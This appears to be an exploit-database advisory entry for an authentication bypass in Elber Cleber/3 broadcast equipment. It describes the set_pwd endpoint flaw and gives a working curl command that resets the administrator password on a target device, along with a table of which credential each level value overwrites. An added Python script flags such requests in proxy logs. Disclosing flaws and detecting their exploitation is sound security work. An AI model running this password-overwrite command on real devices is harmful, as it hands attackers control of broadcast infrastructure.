
7 changes to exploits/shellcodes/ghdb

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure
73 lines
No EOL
2.5 KiB
Text
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.0.0 Revision 7304
                  1.0.0 Revision 7284
                  1.0.0 Revision 6505
                  1.0.0 Revision 6332
                  1.0.0 Revision 6258
                  XS2DAB v1.50 rev 6267

Summary: Cleber offers a powerful, flexible and modular hardware and
software platform for broadcasting and contribution networks where
customers can install up to six boards with no limitations in terms
of position or number. Based on a Linux embedded OS, it detects the
presence of the boards and shows the related control interface to the
user, through both the web GUI and the touchscreen TFT display. Power
supply can be single (AC and/or DC) or dual (hot swappable for
redundancy); customers may choose between two ranges for DC sources,
that is 22-65 or 10-36 Vdc for site or DSNG applications.

Desc: The device suffers from an authentication bypass vulnerability: the
password management functionality can be accessed directly and without
authorization. By manipulating the set_pwd endpoint, an attacker can
overwrite the password of any user within the system and so bypass
authentication. This grants unauthorized administrative access to protected
areas of the application, compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
// Client-side handler: sends the level and the new password as GET query
// parameters to json_data/set_pwd.
function apply_pwd(level, pwd)
{
    $.get("json_data/set_pwd", {lev:level, pass:pwd},
    function(data){
        //$.alert({title:'Operation',text:data});
        show_message(data);
    }).fail(function(error){
        show_message('Error ' + error.status, 'error');
    });
}
--------------------------------------------------------------------------

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5816
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php


18.08.2023

--


$ curl -s 'http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234'

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
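
Detection sketch for the set_pwd requests described above. This is an added example, not part of the original advisory or of any vendor code. It assumes that HTTP traffic to the device passes through a reverse proxy writing Apache/nginx "combined" access logs; the function name find_set_pwd_requests and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# lev values and credential names as listed in the advisory's reference table
LEVELS = {
    "7": "snmp_write_pwd", "6": "snmp_read_pwd", "5": "custom_pwd",
    "4": "display_pwd", "2": "admin_pwd", "1": "puser_pwd", "0": "user_pwd",
}

# Assumption: "combined" format lines from a proxy in front of the device
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_set_pwd_requests(lines):
    """Return one finding per logged request to json_data/set_pwd."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m["target"])
        if not url.path.rstrip("/").endswith("/json_data/set_pwd"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        lev = query.get("lev", ["?"])[0]
        findings.append({
            "src": m["src"],
            "time": m["ts"],
            "status": int(m["status"]),
            "lev": lev,
            "credential": LEVELS.get(lev, "unknown"),
            # The password is a GET parameter, so it is also stored in this log
            "password_in_log": "pass" in query,
        })
    return findings

# Constructed sample lines (documentation address ranges), not from a real device
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Aug/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Aug/2023:10:03:44 +0000] "GET /json_data/set_pwd?lev=2&pass=REDACTED HTTP/1.1" 200 17 "-" "curl/8.1.2"',
    '198.51.100.7 - - [18/Aug/2023:10:03:50 +0000] "GET /json_data/set_pwd?lev=7&pass=REDACTED HTTP/1.1" 200 17 "-" "curl/8.1.2"',
]

if __name__ == "__main__":
    for f in find_set_pwd_requests(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} set {f['credential']} (lev={f['lev']}) status={f['status']}")
```

Every hit is worth reviewing against the expected management hosts, and any credential named in a finding should be treated as changed and rotated.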